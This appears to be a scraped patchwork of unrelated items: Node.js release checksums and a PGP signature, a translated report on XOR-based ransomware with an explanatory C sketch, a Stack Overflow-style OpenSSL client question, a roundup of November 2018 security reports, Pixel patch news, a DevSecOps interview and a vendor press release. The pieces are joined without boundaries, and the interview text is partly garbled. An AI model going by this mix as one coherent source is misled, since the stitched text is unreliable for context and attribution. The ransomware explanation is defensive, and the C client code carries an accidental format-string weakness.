63a962748304edcbfbe345db1f1f51cc420517e904c74e3e578c2319a614e520 node-v6.15.1-sunos-x86.tar.xz
3e08c82c95ab32f476199369e894b48d70cbaaaa12c1b67f60584c618a6eb0ca node-v6.15.1.tar.gz
c3bde58a904b5000a88fbad3de630d432693bc6d9d6fec60a5a19e68498129c2 node-v6.15.1.tar.xz
75469afe2bf47868844d84196567180d19e54574787e1cda328227240b8b1b26 node-v6.15.1-win-x64.7z
be2e51d8d62f41be97e8c64011d1e3f32394e2d45b044f49eeb17b11ec77c7e6 node-v6.15.1-win-x64.zip
7acbcea9501df79c8261c2dd9bbb1e452cf98560ccebb178da9bc9b92257b13b node-v6.15.1-win-x86.7z
90f17b524ffe6da2369b90fd507dea9bbad3f7608e8adc1a205de025fb6d3df9 node-v6.15.1-win-x86.zip
9fda93a5ad0fc2b5ef8bddcae697365b4ffce6a366814d4adf22ed813f189d8d node-v6.15.1-x64.msi
7c085e59ebdd8fc9a2090b3c68765acc2314e8fce347f468f67e70420e238a3a node-v6.15.1-x86.msi
b8ee12c5a87b26a11f9aa31ba84905912ebcf21768eeba97a0471d08fc504296 win-x64/node.exe
d806ff42433597ddafb2092cc7d003cf2171630ef2eaf150afdbebe390774542 win-x64/node.lib
db2bbc5b26e945acd4e54e6843c2ff6445000d3c62dd702b094ee0ca3f3ea474 win-x64/node_pdb.7z
15ce2d8f1232c84c8975d7ee56c676097cb39cb6c2a8f4ea0e2ba400b57e6484 win-x64/node_pdb.zip
76b680db25993dd707911c4772630c38ad997579d9b024fb857c60be5b70d43a win-x86/node.exe
4d2ddebf5511cde7f001e9e8312d0a71ec21bc00697990cea44c9fdb3a1488ab win-x86/node.lib
d789353a2e91b4a8ea831388e4f73044bedc2a78d842e7bece22f6d3801b5137 win-x86/node_pdb.7z
c651483ba0451e470f7e66f6d6a0a0ed6dc249cf176cfa88c5afe6cfcf85afe5 win-x86/node_pdb.zip
-----BEGIN PGP SIGNATURE-----

iQEzBAEBCAAdFiEE3Y8jOLrnUB491ax4wnN5L32DVF0FAlwFOegACgkQwnN5L32D
VF1u3wf+JSxl7s0NQYqSZcQErXzOcyOR3Ox8T81DM9MjnT2YIths8I8tMIutmc8D
yuMjkib0A5+lZkNRswMQAGZI58q6vwycUIxgbLJcAsNzbSHf3aGHx5wVeC8wxwUM
FQU+5G8Qt7DAFyI2K3h9D0iKie8/xgbYRrU9YvIj3U+9GOwoyHFYlAsgfiI8UJSh
klXxrYlRUhuyOj6yOLTMm60ANT2NOF5EbgyLVHFvMGEMROX785N6oC9qoYbuPX5V
Q4y9ZBtMMWu+1wkhQkrm+V0QdPT+VRpgxpc6a1PzCBI/3zocIRpc4m/GLupTbI+M
lP0m7nBWyRiOjV2O12mze/gIRbVfMA==
=n+/G
-----END PGP SIGNATURE-----

Ransomware now asks victims to scan a QR code to pay the ransom


In the early hours of December 2, 360 announced that the 360 Internet Security Center had discovered a ransomware virus named "UNNAMED1989". The virus was developed domestically and spreads disguised as private game servers and game cheats. 360 was the first to publish a warning and released a decryption tool in the early hours of December 2; it can effectively block the ransomware's attacks, and users who have already been hit can use 360 Decryption Master to recover their files.

According to the report, once a user is hit by this ransomware, the files on the desktop are encrypted. Interestingly, the ransomware skips directories whose names start with certain strings, such as "Tencent Games" and "League of Legends", and it does not infect files with extensions such as gif, exe and tmp.

After the attack, a "decryption tool" icon is left among the encrypted files to guide the user into paying the ransom. Clicking the icon brings up a QR code page, and the user is asked to pay a ransom of 110 yuan through WeChat's "Scan" feature; the attacker claims files will only be decrypted once the ransom is received. The payment QR code has since been frozen by WeChat.

Technical staff at the 360 Internet Security Center explained that not only is the payment method very local, the encryption method is also minimalist. The virus encrypts files with a rather primitive XOR scheme; after running, it applies some simple processing to a specific identifier, version information and a random string and stores them in the file C:\Users\unname_1989\dataFile\appCfg.cfg.

Once encryption starts, the virus reads data from byte 120 of the appCfg.cfg file, XORs it bitwise with a specific hardcoded string to produce a key, and then uses that key cyclically to XOR-encrypt the contents of each target file.

Because XOR is a very simple form of encryption, a technical decryption of this ransomware became possible.
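To see why such a scheme is trivially reversible, here is a minimal C sketch of cyclic XOR encryption plus an illustrative key-derivation step in the spirit described above; the buffers and the hardcoded string are placeholders, not the actual values used by the sample. Applying xor_crypt a second time with the same key restores the original data, which is exactly what makes a decryption tool feasible.

#include <stdio.h>
#include <string.h>

/* Cyclic XOR: the same routine both encrypts and decrypts. */
void xor_crypt(unsigned char *data, size_t len,
               const unsigned char *key, size_t keylen)
{
    for (size_t i = 0; i < len; i++)
        data[i] ^= key[i % keylen];
}

/* Illustrative key derivation: XOR bytes read from the config file with a
 * hardcoded string (both are placeholders here). */
void derive_key(const unsigned char *cfg_bytes, const unsigned char *hardcoded,
                unsigned char *key_out, size_t keylen)
{
    for (size_t i = 0; i < keylen; i++)
        key_out[i] = cfg_bytes[i] ^ hardcoded[i];
}

int main(void)
{
    unsigned char key[8];
    unsigned char cfg[8]  = "12345678";   /* placeholder for bytes from appCfg.cfg */
    unsigned char hard[8] = "SECRETK1";   /* placeholder for the hardcoded string  */
    unsigned char data[]  = "hello, world";

    derive_key(cfg, hard, key, sizeof key);
    xor_crypt(data, sizeof data - 1, key, sizeof key);  /* encrypt              */
    xor_crypt(data, sizeof data - 1, key, sizeof key);  /* decrypt: same call   */
    printf("%s\n", data);                               /* prints original text */
    return 0;
}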

In response, 360 Security Brain issued a warning: computer users (especially gamers) should not believe claims by cheats or private servers that antivirus alerts are "false positives", should not casually add such programs to the trust list, and should refuse to use any cheat that demands the antivirus be shut down. Individual users should get into the habit of patching vulnerabilities promptly, and server administrators should follow vendor security updates and patch web applications, databases and other application platforms in time.

For users who have already been hit, 360 Decryption Master already supports decrypting files encrypted by this ransomware; it can be found by searching for "360解密大师" (360 Decryption Master) in the tool section of 360 Security Guard.

SSL / HTTPS C Client


I've written a simple SSL/HTTPS client in C using some example code I found. When I use it to send a GET request to an HTTPS server I get an unusual response; this is the response from stackoverflow.com:

HTTP/1.1 200 OK
Cache-Control: public, no-cache="Set-Cookie", max-age=36
Content-Type: text/html; charset=utf-8
Expires: Sat, 03 Jan 2015 16:54:57 GMT
Last-Modified: Sat, 03 Jan 2015 16:53:57 GMT
Vary: *
X-Frame-Options: SAMEORIGIN
Set-Cookie: prov=407726d8-1493-4ebd-8657-8958be5b2683; domain=.stackoverflow.com; expires=Fri, 01-Jan-2055 00:00:00 GMT; path=/; HttpOnly
Date: Sat, 03 Jan 2015 16:54:20 GMT
Content-Length: 239129

<title>Stack Overflow</title>
<link rel="shortcut icon" href="//cdn.sstatic.net/stackoverflow/img/favicon.ico?v=038622610830">
<link rel="apple-touch-icon image_src" href="//cdn.sstatic.net/stackoverflow/img/apple-touch-icon.png?v=fd7230a85918">
<link rel="search" type="application/opensearchdescription+xml" title="Stack Overflow" href="/opensearch.xml">
<meta name="twitter:card" content="summary">
<meta name="twitter:domain" content="stackoverflow.com"/>
<meta property="og:type" content="website" />
<meta property="og:image" itemprop="image primaryImageOfPage" content="http://cdn.sstatic.net/stackoverflow/img/apple-touch-icon@2.png?v=fde65a5a78c6" />

When I use the openssl command line tool to perform the same operation I get a normal response containing the index page. I've tried changing some of the code and followed different tutorials but nothing seems to work. How do I get the program to return the index page instead of the response I currently get? Here's the source code for the program:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <openssl/bio.h>
#include <openssl/ssl.h>
#include <openssl/err.h>

/**
 * Simple log function
 */
void slog(char* message) {
    fprintf(stdout, message);
}

/**
 * Print SSL error details
 */
void print_ssl_error(char* message, FILE* out) {
    fprintf(out, message);
    fprintf(out, "Error: %s\n", ERR_reason_error_string(ERR_get_error()));
    fprintf(out, "%s\n", ERR_error_string(ERR_get_error(), NULL));
    ERR_print_errors_fp(out);
}

/**
 * Print SSL error details with inserted content
 */
void print_ssl_error_2(char* message, char* content, FILE* out) {
    fprintf(out, message, content);
    fprintf(out, "Error: %s\n", ERR_reason_error_string(ERR_get_error()));
    fprintf(out, "%s\n", ERR_error_string(ERR_get_error(), NULL));
    ERR_print_errors_fp(out);
}

/**
 * Initialise OpenSSL
 */
void init_openssl() {
    /* call the standard SSL init functions */
    SSL_load_error_strings();
    SSL_library_init();
    ERR_load_BIO_strings();
    OpenSSL_add_all_algorithms();

    /* seed the random number system - only really nessecary for systems without '/dev/random' */
    /* RAND_add(?,?,?); need to work out a cryptographically significant way of generating the seed */
}

/**
 * Connect to a host using an encrypted stream
 */
BIO* connect_encrypted(char* host_and_port, char* store_path, SSL_CTX** ctx, SSL** ssl) {
    BIO* bio = NULL;
    int r = 0;

    /* Set up the SSL pointers */
    *ctx = SSL_CTX_new(TLSv1_client_method());
    *ssl = NULL;
    r = SSL_CTX_load_verify_locations(*ctx, store_path, NULL);
    if (r == 0) {
        print_ssl_error_2("Unable to load the trust store from %s.\n", store_path, stdout);
        return NULL;
    }

    /* Setting up the BIO SSL object */
    bio = BIO_new_ssl_connect(*ctx);
    BIO_get_ssl(bio, ssl);
    if (!(*ssl)) {
        print_ssl_error("Unable to allocate SSL pointer.\n", stdout);
        return NULL;
    }
    SSL_set_mode(*ssl, SSL_MODE_AUTO_RETRY);

    /* Attempt to connect */
    BIO_set_conn_hostname(bio, host_and_port);

    /* Verify the connection opened and perform the handshake */
    if (BIO_do_connect(bio) < 1) {
        print_ssl_error_2("Unable to connect BIO.%s\n", host_and_port, stdout);
        return NULL;
    }

    if (SSL_get_verify_result(*ssl) != X509_V_OK) {
        print_ssl_error("Unable to verify connection result.\n", stdout);
    }

    return bio;
}

/**
 * Read a from a stream and handle restarts if nessecary
 */
ssize_t read_from_stream(BIO* bio, char* buffer, ssize_t length) {
    ssize_t r = -1;

    while (r < 0) {
        r = BIO_read(bio, buffer, length);
        if (r == 0) {
            print_ssl_error("Reached the end of the data stream.\n", stdout);
            continue;
        } else if (r < 0) {
            if (!BIO_should_retry(bio)) {
                print_ssl_error("BIO_read should retry test failed.\n", stdout);
                continue;
            }
            /* It would be prudent to check the reason for the retry and handle
             * it appropriately here */
        }
    };

    return r;
}

/**
 * Write to a stream and handle restarts if nessecary
 */
int write_to_stream(BIO* bio, char* buffer, ssize_t length) {
    ssize_t r = -1;

    while (r < 0) {
        r = BIO_write(bio, buffer, length);
        if (r <= 0) {
            if (!BIO_should_retry(bio)) {
                print_ssl_error("BIO_read should retry test failed.\n", stdout);
                continue;
            }
            /* It would be prudent to check the reason for the retry and handle
             * it appropriately here */
        }
    }

    return r;
}

/**
 * Main SSL demonstration code entry point
 */
int main() {
    char* host_and_port = "stackoverflow.com:443";
    char* server_request = "GET / HTTP/1.1\r\nHost: stackoverflow.com\r\n\r\n";
    char* store_path = "mycert.pem";
    char buffer[4096];
    buffer[0] = 0;

    BIO* bio;
    SSL_CTX* ctx = NULL;
    SSL* ssl = NULL;

    /* initilise the OpenSSL library */
    init_openssl();

    if ((bio = connect_encrypted(host_and_port, store_path, &ctx, &ssl)) == NULL)
        return (EXIT_FAILURE);

    write_to_stream(bio, server_request, strlen(server_request));
    read_from_stream(bio, buffer, 4096);
    printf("%s\r\n", buffer);

    /* clean up the SSL context resources for the encrypted link */
    SSL_CTX_free(ctx);

    return (EXIT_SUCCESS);
}

You call read_from_stream to read at most 4096 bytes, but the answer may be much longer than this. You must keep reading until the call returns 0. You must also clean the buffer before each read. Like this:

int l;
bzero(buffer, 4096);                                     // clean the buffer
while ((l = read_from_stream(bio, buffer, 4096)) > 0) {  // try to read 4096 bytes
    printf("%s", buffer);                                // write exactly what was read...
    bzero(buffer, 4096);                                 // clean the buffer
}

Be careful that the server can send you ASCII nul bytes (rare in HTML pages, but possible for another kind of data)... This code doesn't take this into account.

Normally you have to decode headers, and decode the Content-Length: one. It is intended to give you the number of bytes of data to read after HTTP headers (in your example it is 239129).
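For example, here is a minimal sketch of pulling the Content-Length value out of a NUL-terminated header block; the helper name is mine and the parsing is deliberately simplistic (case-sensitive, no validation), just to show the idea:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Find "Content-Length:" in a NUL-terminated header block and return its
 * numeric value, or -1 if the header is absent. */
long parse_content_length(const char *headers)
{
    const char *p = strstr(headers, "Content-Length:");
    if (p == NULL)
        return -1;
    return atol(p + strlen("Content-Length:"));
}

int main(void)
{
    const char *resp = "HTTP/1.1 200 OK\r\nContent-Length: 239129\r\n\r\n";
    printf("%ld\n", parse_content_length(resp));   /* prints 239129 */
    return 0;
}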

Research shows that cyber security threats keep evolving


Cyber security industry research reports are a good way to keep up with the latest threats and to keep those weaknesses from undermining your control of the organization. The research published in November 2018 covers every area of IT risk, including identity, application containers, vulnerability disclosure, and the global threat landscape itself. Below are the key points of 11 reports released this month, along with what cyber defense organizations should consider implementing.

Distil Networks: how bots affect airlines

Automated processes, commonly called bots, can serve good or bad purposes. In a report released by Distil Networks on November 14, researchers said malicious bots are especially prevalent on airline websites, mobile apps and APIs, accounting for 43.9% of traffic.

Distil found that although some bots are unsophisticated, 84.3% of the bots on airline domains are moderately sophisticated or advanced and hard to detect. Malicious bots can be used to impersonate real users, steal credentials and carry out other malicious activity.

Mike Rogers, vice president of services at Distil Networks, said: "Bad bot activity against airlines has risen in recent months, which shows that this industry now holds enough information to be exploited for profit or to cause damage."

Fortinet Global Threat Landscape Report

The Fortinet Global Threat Landscape report, released on November 14, takes a broad look at cyber security trends over the past few months.

Its headline findings show that unique malware is on the rise again, with Fortinet observing 43% year-over-year growth. Fortinet also said the number of malware families grew by 32%.

The use of HTTPS-encrypted traffic also reached a new milestone, accounting for 72% of all network traffic, up from 55% in 2017.

"Cyber threats are growing fast and every organization is feeling the impact, with detections and attacks increasing every day. Ransomware used to be the hot topic; now cryptojacking, mobile malware and attacks on business-critical supply chains are surging," said Fortinet CISO Phil Quade.

Key takeaway: malware may look like an old-school form of attack, but it is still growing, and organizations need proper anti-malware, network and EDR technology to limit the risk.

InteliSecure

According to InteliSecure's 2018 State of Critical Data Protection report, released on November 15, there is a major gap between how organizations think about protecting sensitive data and how they actually protect it.

The report found that 90% of surveyed organizations have policies stating how sensitive data should be stored and protected on employee systems. Despite these policies, most organizations do not have a programmatic approach to maintaining them.

InteliSecure CEO Steven Drew said: "While threats to the enterprise keep growing in scale, sophistication and frequency, the cyber security skills shortage is clearly even more frustrating for most organizations, especially those that choose to go it alone."

Key takeaway: having a policy for managing sensitive data is good, but having the tools, processes and people to actually enforce it is better.

ObserveIT Holiday Travel Cyber Security Risk Survey

According to a report released by ObserveIT on November 15, travel represents a cyber security risk.

Among the biggest risks exposed during travel, 77% of respondents said they have used free or public Wi-Fi while traveling. In addition, 63% admitted to using free public Wi-Fi to access work email and files while traveling.

Although holidays are supposed to be time off, 55% of respondents said they take work devices with them on holiday trips.

ObserveIT CEO Mike McKee wrote in a statement: "This research not only confirms that employees do not put cyber security first when traveling, it also highlights gaps in security awareness training that fail to mitigate the threats of remote work. While technology lets people work efficiently wherever they are, it also creates new ways for hackers to break into otherwise secure systems."

Key takeaway: be wary of free public Wi-Fi, and use a VPN to help secure and facilitate remote access.

Ping Identity: attitudes and behavior in a post-breach era

How do data breaches affect consumer loyalty and engagement? That is the key question answered by Ping Identity's 2018 Consumer Attitudes and Behavior survey.

In the survey, published on November 7, 78% of respondents said they would stop engaging with a brand online after a data breach, and 49% said they would not use an online service or application that had recently been breached.

Data breaches also change consumer behavior: 47% of respondents said they have changed how they protect their personal data as a result of recent breaches.

Ping Identity CTO Sarah Squire said: "With data breaches so prevalent, enterprises must have the right controls in place or they risk losing consumer trust and business. Just as people expect brands to provide a friendly user experience, brands must understand the value and importance of a strong identity management strategy."

Key takeaway: prepare for and limit the risk of data leaks by securing identity and access management, and consider using breach and attack simulation (BAS) technology.

Risk Based Security Q3 2018 Report

While Fortinet reported an increase in the number of unique malware families it found, Risk Based Security's Q3 2018 vulnerability report offers a different perspective.

The November 15 report found that the number of vulnerabilities in the first three quarters of 2018 was down 7% compared with the same period in 2017. Not all vulnerabilities are equal, however; their severity and impact vary. Risk Based Security's report shows that 15.4% of Q3 vulnerabilities were rated critical.

Looking at root causes, 67.3% of vulnerabilities were due to insufficient or improper input validation. Not every flaw has a fix, which the report flags as a key challenge: more than a quarter (24.9%) of reported vulnerabilities currently have no known solution.

"We see many vulnerabilities being actively exploited before most organizations are even aware of the issues. Learning about a vulnerability only after the damage is done is an unfortunate situation," said Brian Martin, vice president of vulnerability intelligence at Risk Based Security.

Key takeaway: have an active patch management strategy so that remediation happens in a timely manner.

SailPoint 10th Annual Market Pulse Survey

SailPoint's 10th annual Market Pulse Survey, released on November 13, offers a deep look at identity governance practices.

One highlight: 75% of respondents admitted to reusing passwords across multiple accounts, including personal and work accounts. That is a significant increase from 2014, when only 56% of respondents admitted to doing the same.

Employees are not only increasingly ignoring password best practices, they are also ignoring other IT policies they find inconvenient. In SailPoint's survey, 55% of respondents said their IT department can be a source of inconvenience, which leads employees to ignore IT policy and install their own software.

SailPoint CMO Juliette Rizkallah said: "To secure and enable today's workforce, users have become the new security perimeter, and their digital identities are the common thread across an organization's IT ecosystem at every stage of digital transformation."

Key takeaway: make sure IT is an enabler for employees rather than an inconvenience they have to work around. Where possible, lock down company-owned devices to control what gets downloaded, and strengthen password management.

Secureworks: 2018 State of Cybercrime Report

According to the Secureworks 2018 State of Cybercrime report, released on November 13, cybercrime groups are growing in number and using increasingly advanced techniques.

From July 2017 to June 2018, researchers from the Secureworks Counter Threat Unit (CTU) analyzed incident response outcomes and conducted original research to gain insight into threat activity and behavior across 4,400 companies.

A key finding of the report: nation-state actors increasingly use the tools and techniques of cyber criminals, and vice versa. Secureworks reports that criminal gangs now combine advanced social engineering techniques with network intrusion methods that deliver point-of-sale (POS) malware.

"Cybercrime is a lucrative industry, so it is no surprise that it has become the province of powerful, organized groups," said Don Smith, senior director of the cyber intelligence cell at the Secureworks Counter Threat Unit.

Key takeaway: understand the broader security landscape and have controls that can respond to targeted and advanced persistent threats.

StackRox State of Container Security

On November 14, StackRox released its first State of Container Security report, a deep dive into the nascent world of application container security.

Containers can run in many types of deployments; StackRox found that 40% of its respondents run containers in hybrid environments spanning on-premises infrastructure and the cloud.

On container security, 54% of respondents said misconfiguration and accidental data exposure worry them most, and 44% of organizations said they are more concerned about the runtime phase of containers than about the build and deploy phases.

StackRox CEO Kamal Shah said: "The influence of DevOps and the rapid adoption of containerization and Kubernetes have made application development more seamless, efficient and powerful than ever. However, our survey results show that security remains a significant challenge in enterprises' container strategies."

Key takeaway: have technology that can monitor and manage the runtime behavior of applications, whether they run in containers or elsewhere.

Tanium Resilience Gap Study

While it is impossible to stop every attack, organizations can build infrastructure and processes that make their operations more resilient.

The Tanium resilience gap study, released on November 14, found a divide in how resilient enterprises are to cyber attacks. 96% of respondents said they believe making technology resilient to business disruption should be core to their company's wider business strategy.

The reality, however, is that only 61% of respondents claim their organizations can actually cope with business disruption.

Tanium CSO David Damato said: "The pace and complexity of technological change have pushed enterprises to buy multiple tools to address IT security and operations challenges. In turn, this has created a fragmented collection of endpoint management and security solutions, leaving enterprise environments fragile, vulnerable to attack and lacking the business resilience needed to mitigate threats."

Key takeaway: do not focus only on threat detection and identification; also consider the organization's resilience and its ability to keep operating in the face of threats.

Tenable Vulnerability Intelligence Report

According to the Tenable Vulnerability Intelligence Report released on November 7, 19,000 vulnerabilities are expected to be disclosed in 2018, up 27% from 2017. Tenable reports that enterprises identify an average of 870 unique vulnerabilities per day.

Not all vulnerabilities are equally severe; on average only about 100 per day have a critical impact. According to Tenable, organizations as a whole are still struggling with the volume of alerts and vulnerability activity and with defining the corresponding remediation actions.

"When everything is urgent, triage fails," said Tom Parsons, senior director of product management. "As an industry, we need to recognize that effectively reducing cyber risk starts with effectively prioritizing issues."

Key takeaway: make sure you have a vulnerability management system in place and understand the real risk when prioritizing patches and fixes.

December security patch rolling out to Pixel & Nexus, factory images and O ...


The Pixel 3 and Pixel 3 XL received their first update to address a handful of bugs with last month's security patch. Since then, more issues have arisen, and the December security patch rolling out today addresses them. Meanwhile, the Nexus 5X and 6P are still receiving updates this month.

The Nexus 5X, Nexus 6P, and Pixel C are still receiving security updates, despite passing the three-year deadline for guaranteed fixes from Google last month. Meanwhile, the Pixel and Pixel XL patch is again delayed, as it was in November.

There are 17 issues resolved in the December security patch dated 2018-12-01 and 36 for 2018-12-05. Vulnerabilities range from high to critical severity, with the most severe relating to the media framework and a remote attacker possibly executing arbitrary code through a crafted file.

As usual, Google notes that there are no reports of customers being affected by these security issues. The company cited in its 2017 year-in-review of Android security that 30% more devices received patches compared to the prior year.

The dedicated bulletin for Google’s phones and tablets lists one additional security fix and 13 functional updates.



The full download and OTA links for the December security patch are below. If you need help, check out our guides on how to flash a factory or OTA image.

Android 9.0

Pixel 3 XL: Android 9.0 ― PQ1A.181205.006 ― Factory Image ― OTA
Pixel 3: Android 9.0 ― PQ1A.181205.006 ― Factory Image ― OTA
Pixel 2 XL: Android 9.0 ― PQ1A.181205.002 ― Factory Image ― OTA
Pixel 2: Android 9.0 ― PQ1A.181205.002 ― Factory Image ― OTA
Pixel C: Android 8.1 ― OPM8.181205.001 ― Factory Image ― OTA
Nexus 6P: Android 8.1 ― OPM7.181205.001 ― Factory Image ― OTA
Nexus 5X: Android 8.1 ― OPM7.181205.001 ― Factory Image ― OTA

Check out 9to5Google on YouTube for more news:

Q&A Rain Capital’s Chenxi Wang on ‘DevSecOps’


CloudBees sponsored this story, as part of an ongoing series on “ Cloud Native DevOps .” Check back through the month on further editions.

Turning your IT shop into a DevOps shop is the way to go if you are in a competitive industry based any way at all on the quality and feature set of your software. But, as Marriott has just discovered , all your work will be for naught if a malicious attacker penetrates your system. But how do you get security into the flow of your software lifecycle?

For answers, we sought out Dr. Chenxi Wang , the founder and General Partner of Rain Capital , an early stage Cybersecurity-focused venture fund. Dr. Wang is also the co-founder of the Jane Bond Project , a cybersecurity consultancy.

Prior to that, Chenxi served as the Chief Strategy Officer at Twistlock, where she was in large part responsible for that cloud native security company's early growth. Before that, Chenxi built an illustrious career at Forrester Research, Intel Security, and CipherCloud. At Forrester, Chenxi wrote many hard-hitting research papers. At Intel Security, she led the ubiquity strategy spanning both hardware and software platforms. Chenxi started her career as a faculty member in Computer Engineering at Carnegie Mellon University.


So, we want to find out more about security for cloud native operations, and how it affects DevOps practices…

The cloud native environment is such that things just come and go very easily. You've got an ephemeral sort of workload. And you've also potentially got a very large-scale system. Lots of cloud native environments have internet-scale applications. So you've got very large systems that are dynamically orchestrated. That's kind of the nature of it.

So there are a few things security cannot rely on. For instance, security becoming part of an infrastructure: you have to be very careful about embedding security into the infrastructure.

For instance, in the past you could instrument the server, right? But if you don't know where your workload is going to run tomorrow, and it goes from this cloud to another cloud, then you may not be able to count on this type of server instrumentation everywhere.

If you are using serverless then you can't really instrument the server, so a lot of things have to be pushed up the stack into the application layer. [The instrumentation] travels with the application, for instance. Or it's done through a different set of infrastructure, like security is done through the orchestrator, for instance. So thinking about where in the infrastructure layer security is going to fit is an interesting thing for the cloud native environment.

I’m kind of curious about the idea of moving up the stack to the application layer. Either you think about the application security and you also think about doing as much through the orchestrator as possible because those are the key elements are always going to be there in a cloud environment.

I’m seeing less of the kernel level agents more the user-land capabilities. I’m also seeing a lot of data that is only now decrypted at the application, not in the network. The data security policies all have to happen very close to the application. So, that’s the part that is really interesting I think.

Things are coming out of infrastructure and getting pushed to the application layer. But I don’t mean things that are embedded into the application per se but they are actually being separated out from the application as a separate entity. So if you think about the service mesh ―the service mesh is a new capability that abstracts networking and security from the application.

So at the same time as things get pushed to layer seven things also getting more modular in the sense that application developers can focus on application. They don’t have to worry about networking, they don’t have to worry about security and, security and networking functions are being encapsulated into sort of manageable units itself being microservice driven. So I see that as a march trend where things are moving in that direction.

Authentication itself is a difficult thing to do. And so it's better [this way]: somebody in the organization sets up a standard for the useful tools [to use] and says, here's your certificate authority, because it would be a lot to ask of each developer, for each application, to do it correctly. It's something for all of them to agree on. That sounds a bit like the Google Zero Trust Model?

Yes. So it’s … I wouldn’t say the Google Zero Trust model, the Zero Trust models actually defined by Forrester. Google had its own version of zero trust, which it called BeyondCorp . And at the most fundamental layer, they are both the same thing. They basically say “OK, so if I’m an application, I want to talk to the other application. I want that network between us to just be a conduit. The network is not going to see me anything other than metadata. It’s not a new process payload is not going to process identities. It’s just going to be a dumb pipe.”

And that has a lot of implications when you cannot do network level interception and filtering. So things have to happen either on the endpoint or in the application. It's happening more readily in a cloud native environment because everything is decentralized anyway, and it's easier to treat [issues] inside your corporate [environment] in the same way as [those] external to your company.

Are there issues we should think about when talking about security and DevSecOps?

Yes, absolutely. So another aspect of cloud native applications is that they are updated all the time. And as new functions getting pushed to production systems, security has to be with it. Security has to be part of the CI/CD pipeline.

In the past, with the major releases, you had your security reviews and security testing all done. Everything else stopped until you finished that. That doesn't work anymore, so vulnerability scanning has to be done in a way that fits seamlessly into the CI/CD process.

Are you finding that there are two total providers who are moving in this direction?

If you look at security, automation is probably one of the biggest recurring themes we’ve heard of late. Security has gone from the manual review to security engineering, meaning that the tasks are carried out automatically. The metrics are gathered automatically, the different tasks are stitched together automatically and reporting is done automatically.

I don’t think we are 100 percent there yet, it’s definitely happening in that direction.

Culture seems to be a big issue that an organization must face when moving to DevOps. It's getting developers and system administrators on the same page and having them rethink their jobs. What are some of the issues that people should think about in terms of DevOps in light of security?

So, yes. One thing in terms of culture is, I think, that security products and security technology in the past were predominantly produced for security users, right? So you, the users of

Google addresses Pixel 3 RAM management, camera performance, and more w/ Decembe ...


Google detailed the December security patch this morning for all Android devices. For the Made by Google lineup, this update addresses a number of issues that have cropped up since the launch of the Pixel 3 and Pixel 3 XL. Fixes include RAM management and camera performance.

The Pixel / Nexus Security Bulletin for December 2018 notes 13 "functional patches," in addition to one security update.

These updates are included for affected Pixel devices to address functionality issues not related to the security of Pixel devices. The table includes associated references; the affected category, such as Bluetooth or mobile data; improvements; and affected devices.

One of the most important issues addressed by this month's patch is aggressive memory management that would prevent some apps from running simultaneously. For example, snapping a picture with the camera app stopped background audio playback for some users.

Last month, Google confirmed that the fix would "keep background apps from being prematurely closed," with it being referred to as "Improved memory performance in certain circumstances" and "Improved camera capture performance" in the December security patch. It applies to both the Pixel 2 and Pixel 3 lines.

Also on the camera front, Google notes “ Adjusted autofocus behavior ” and “ Improved camera shutter performance ” for the Pixel 3 and Pixel 3 XL. There is also “ Improved contouring on HDR color on certain media apps ” for the new phones. Meanwhile, the Pixel Stand benefits from “ Improved notification visibility ” and “ Improved hotword performance . “

Google notes “ Improved Android Auto compatibility ” for the second and third-generation Pixel devices, as well “ Improved audio performance for when using Android Auto in certain vehicles ” on the Pixel 3.

Another display issue, flickering on the Ambient Display, is likely fixed by " Improved Always On Display triggering . "

As they move the device around, the Pixel 3 display flickering issue kicks in and lights up the bottom portion of the display in a bright white before going back to normal. In this user’s case, the issue started about three weeks after receiving the phone.

Other fixes include “ Improved USB-C Audio accessory detection ” on the Pixel 3 XL, while all Pixel phones benefit from “ Adjusted volume behavior when toggling Bluetooth ” and “ Improve unlocking performance when using Bluetooth .”



Check out 9to5Google on YouTube for more news:

Mesosphere Partners with Macquarie Government


Today, we are excited to announce our partnership with Macquarie Government. This exclusive partnership will make Mesosphere's industry-leading cloud management technologies available to the Australian government and combines the power of Mesosphere's big data platform-as-a-service and next-generation application development with Macquarie's federally accredited cloud services.

This partnership will enable government agencies throughout the country to drive and leverage their big data investments, reduce their public cloud spend by up to 30 percent, and cut application development lifecycles by almost 50 percent. In addition, it will give them freedom and choice in their IT environment, all while accelerating their time to value for new digital initiatives.

“Macquarie Government is committed to delivering innovations that create a performance and security benefit for our government customers and steer their agencies toward a more efficient digital future,” said Aidan Tudehope, Managing Director.

The Macquarie Government and Mesosphere partnership will enable government agencies to modernize their IT environment for increased agility, flexibility, management, and security.

“The partnership with Macquarie Government is exciting, as it will expand the data services and frameworks offered on the DC/OS Service Catalogue,” said William Freiberg, Chief Operating Officer, Mesosphere.

“We look forward to working with the Macquarie Government team to assist federal and state governments to break the shackles of proprietary cloud lock-in and deliver an accelerated time-to-market with the infrastructure and services needed to deploy machine learning and IoT applications at scale.”

December security update brings fixes for memory, camera, and more to the Google ...


At the beginning of every month, Google releases new Android security patches for their devices and outlines updates for the ecosystem as a whole. These updates are usually not terribly exciting, with a few notable fixes here and there. This month, however, includes pretty big updates for the Pixel 3, Pixel 3 XL, Pixel, and Pixel 2 XL. Google is finally addressing the aggressive RAM management, among other things.

The Pixel/Nexus Security Bulletin this month includes a whopping 13 functional patches, most of which are for Pixel 3 devices. You’ll notice the theme around the patches is “improved” and “adjusted.”

Category | Improvements | Devices
Performance | Improved memory performance in certain circumstances | Pixel 2, Pixel 2 XL, Pixel 3, Pixel 3 XL
Camera | Improved camera capture performance | Pixel 2, Pixel 2 XL, Pixel 3, Pixel 3 XL
Pixel Stand | Improved notification visibility when using Pixel Stand | Pixel 3, Pixel 3 XL
Android Auto | Improved Android Auto compatibility | Pixel 2, Pixel 2 XL, Pixel 3, Pixel 3 XL
Camera | Adjusted autofocus behavior | Pixel 3, Pixel 3 XL
Pixel Stand | Improved hotword performance when using Pixel Stand | Pixel 3, Pixel 3 XL
Display | Improved Always On Display triggering | Pixel 3, Pixel 3 XL
Audio | Improved USB-C Audio accessory detection | Pixel 3 XL
Bluetooth | Adjusted volume behavior when toggling Bluetooth | Pixel, Pixel XL, Pixel 2, Pixel 2 XL, Pixel 3, Pixel 3 XL
Android Auto | Improved audio performance for when using Android Auto in certain vehicles | Pixel 3, Pixel 3 XL
Media | Improved contouring on HDR color on certain media apps | Pixel 3, Pixel 3 XL
Camera | Improved camera shutter performance | Pixel 3, Pixel 3 XL
